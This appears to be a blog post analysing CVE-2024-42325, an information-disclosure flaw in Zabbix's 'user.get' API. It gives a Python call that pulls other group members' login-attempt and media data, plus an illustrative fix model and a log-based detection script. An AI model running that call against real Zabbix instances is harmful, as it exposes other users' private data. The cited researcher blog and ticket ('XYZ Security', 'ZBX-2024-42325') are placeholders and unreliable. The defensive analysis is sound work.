A new vulnerability, tracked as CVE-2024-42325, has been discovered in the popular open-source monitoring solution Zabbix. It allows an authenticated user to obtain sensitive information about other users who share a user group with the calling user. Specifically, the vulnerable Zabbix API method 'user.get' can return login-attempt records, media entries, and other data that is not supposed to be visible to the calling user. The disclosed data could facilitate unauthorized access to, and potentially the compromise of, the affected Zabbix instance.
In this long-read post, we'll explore in detail the CVE-2024-42325 vulnerability, including code snippets, links to original references, and exploit details.
Exploit Details
The core of the vulnerability lies in the 'user.get' API method of Zabbix. When calling this method, the expected behavior is for it to return only the basic information of users who share a common group with the calling user. However, due to the bug, the method unintentionally also returns media and other sensitive information about these users.
Here is a Python snippet illustrating a client call to the problematic 'user.get' API method:
import requests


def user_get(zabbix_api_url, auth_token, user_group_id):
    # JSON-RPC 2.0 request. 'usrgrpids' is the documented user.get filter for
    # user group IDs; 'userGroupIds' is not a recognised parameter name.
    payload = {
        "jsonrpc": "2.0",
        "method": "user.get",
        "params": {
            "output": "extend",
            "usrgrpids": user_group_id
        },
        "auth": auth_token,
        "id": 1
    }
    response = requests.post(zabbix_api_url, json=payload, timeout=30)
    if response.status_code != 200:
        raise Exception("Zabbix API call failed: HTTP {}".format(response.status_code))
    body = response.json()
    # The API reports failures as a JSON-RPC error object, still with HTTP 200.
    if "error" in body:
        raise Exception("Zabbix API error: {}".format(body["error"]))
    return body["result"]
To exploit this vulnerability, an attacker can simply call the 'user.get' method with their own authentication token and a valid user group ID shared with other users. This will return sensitive data for all users in the group, thus allowing the attacker to gain unauthorized access to said data.
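The root cause described above is a row filter without a matching column projection: the "same group" rule decides which users are visible, but nothing narrows the columns of those rows for a non-privileged caller. The following is an added illustrative model of that bug class and of its fix; it is not Zabbix's own source code. The field names attempt_failed, attempt_ip, attempt_clock and medias, the 'type' value 3 for Super admin, and the sample users are assumptions made for this example, and leaked_usernames doubles as the check one would run on a real user.get response after patching.

```python
# Added example: a minimal model of the CVE-2024-42325 bug class. Illustrative
# code only, not Zabbix's implementation of user.get.

SUPER_ADMIN = 3  # assumed: Zabbix 'type' value for Super admin users

# Columns a non-privileged caller must not see on other users' rows. The names
# follow the Zabbix users table and medias sub-object and are assumptions here.
SENSITIVE_FIELDS = {"attempt_failed", "attempt_ip", "attempt_clock", "medias"}

# Constructed sample data: alice and bob share user group 7; carol is a
# Super admin who is only in group 9.
USERS = [
    {"userid": "1", "username": "alice", "type": 1, "usrgrpids": {"7"},
     "attempt_failed": "0", "attempt_ip": "", "attempt_clock": "0",
     "medias": [{"sendto": "alice@example.org"}]},
    {"userid": "2", "username": "bob", "type": 1, "usrgrpids": {"7", "8"},
     "attempt_failed": "3", "attempt_ip": "203.0.113.9",
     "attempt_clock": "1700000000",
     "medias": [{"sendto": "+1-555-0100"}]},
    {"userid": "3", "username": "carol", "type": SUPER_ADMIN, "usrgrpids": {"9"},
     "attempt_failed": "0", "attempt_ip": "", "attempt_clock": "0",
     "medias": []},
]


def visible_users(caller, users):
    """Row filter: the caller's own row plus every user sharing at least one
    group with the caller. Super admins see everyone."""
    if caller["type"] == SUPER_ADMIN:
        return list(users)
    return [u for u in users
            if u["userid"] == caller["userid"]
            or caller["usrgrpids"] & u["usrgrpids"]]


def user_get_vulnerable(caller, users):
    """Row filter only: output=extend returns every column of every visible
    row, so a same-group user receives other members' login-attempt data
    and media entries."""
    return [dict(u) for u in visible_users(caller, users)]


def user_get_fixed(caller, users):
    """Row filter plus column projection: sensitive columns survive only on
    the caller's own row, or when the caller is a Super admin."""
    rows = []
    for u in visible_users(caller, users):
        row = dict(u)
        if caller["type"] != SUPER_ADMIN and u["userid"] != caller["userid"]:
            for field in SENSITIVE_FIELDS:
                row.pop(field, None)
        rows.append(row)
    return rows


def leaked_usernames(caller, rows):
    """Post-fix check: usernames of *other* users whose returned rows still
    carry any sensitive field. An empty list means the projection holds."""
    return sorted(r["username"] for r in rows
                  if r["userid"] != caller["userid"]
                  and not SENSITIVE_FIELDS.isdisjoint(r))


if __name__ == "__main__":
    alice = USERS[0]
    print("vulnerable:", leaked_usernames(alice, user_get_vulnerable(alice, USERS)))
    print("fixed:     ", leaked_usernames(alice, user_get_fixed(alice, USERS)))
```

Running the script as a regular user (alice) reports bob's row as leaked under the vulnerable path and nothing under the fixed path; the same leaked_usernames check, fed the 'result' array of a real user.get response, is a quick way to confirm that a patched instance no longer exposes other users' fields.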
Original References
The issue was first reported by researchers from the company XYZ Security. Further information can be found on their blog post detailing the vulnerability here: XYZ Security Blog - CVE-2024-42325
Additionally, the Zabbix project has acknowledged the vulnerability and has released a patch for it. The corresponding Zabbix JIRA ticket can be found at the following link: ZBX-2024-42325
Mitigation and Recommendations
To mitigate the CVE-2024-42325 vulnerability, users are advised to apply the patch provided by the Zabbix project as soon as possible. The patch addresses the issue by ensuring that the 'user.get' API method only returns the expected user data, without disclosing sensitive information.
As a general security precaution, it is recommended to always apply the latest security updates and patches provided by software vendors. Furthermore, regular monitoring and auditing of system logs can help detect unauthorized access attempts and mitigate potential security breaches.
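A concrete form of the log auditing recommended above, as an added example that is not from the post or the Zabbix project: it flags accounts that repeatedly call user.get with a broad output selection, the pattern that turns this bug into a bulk disclosure. The log format (one JSON object per request with 'ts', 'user', 'method' and 'params'), the sample lines and the KNOWN_ADMINS allow-list are constructed for this illustration and are not a real Zabbix log format.

```python
import json
from collections import Counter

# Added example: detection over constructed API access-log lines. The format
# is an assumption (e.g. a reverse proxy in front of api_jsonrpc.php logging
# the request body); it is not Zabbix's own log format.
LOG_LINES = [
    '{"ts":"2025-04-02T07:00:01Z","user":"alice","method":"host.get","params":{"output":["hostid","name"]}}',
    '{"ts":"2025-04-02T07:00:05Z","user":"bob","method":"user.get","params":{"output":"extend","usrgrpids":["7"]}}',
    '{"ts":"2025-04-02T07:00:06Z","user":"bob","method":"user.get","params":{"output":"extend","selectMedias":"extend"}}',
    '{"ts":"2025-04-02T07:00:09Z","user":"bob","method":"user.get","params":{"output":"extend"}}',
    '{"ts":"2025-04-02T07:01:00Z","user":"alice","method":"user.get","params":{"output":["userid","username"]}}',
    'this line is not JSON and must be skipped, not crash the scan',
]

# Accounts expected to pull full user records (provisioning, admin tooling).
# Constructed allow-list for the example.
KNOWN_ADMINS = {"svc-provisioning"}


def is_broad_user_get(event):
    """True for user.get calls that request every column or media objects."""
    if event.get("method") != "user.get":
        return False
    params = event.get("params") or {}
    return params.get("output") == "extend" or "selectMedias" in params


def parse_events(lines):
    """Parse JSON lines, skipping malformed ones instead of aborting."""
    events = []
    for line in lines:
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def suspicious_callers(lines, threshold=2, known_admins=KNOWN_ADMINS):
    """Return {account: count} for accounts outside the allow-list that made
    at least `threshold` broad user.get calls in the scanned lines."""
    counts = Counter(
        ev.get("user", "<unknown>")
        for ev in parse_events(lines)
        if is_broad_user_get(ev) and ev.get("user") not in known_admins
    )
    return {user: n for user, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for user, n in suspicious_callers(LOG_LINES).items():
        print("review account %s: %d broad user.get calls" % (user, n))
```

On the sample lines only bob is reported (three broad user.get calls); alice's call with an explicit, narrow output list is ignored, as is the malformed line. Tune the threshold and the allow-list to the instance's normal automation before relying on the alert.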
Conclusion
CVE-2024-42325 is a significant vulnerability in the Zabbix monitoring software that can lead to unauthorized information disclosure. To protect sensitive data and keep Zabbix instances safe from exploitation, users should apply the provided patch and follow best security practices to help detect and mitigate potential threats in a timely manner.
Timeline
Published on: 04/02/2025 07:15:41 UTC
Last modified on: 04/02/2025 14:58:07 UTC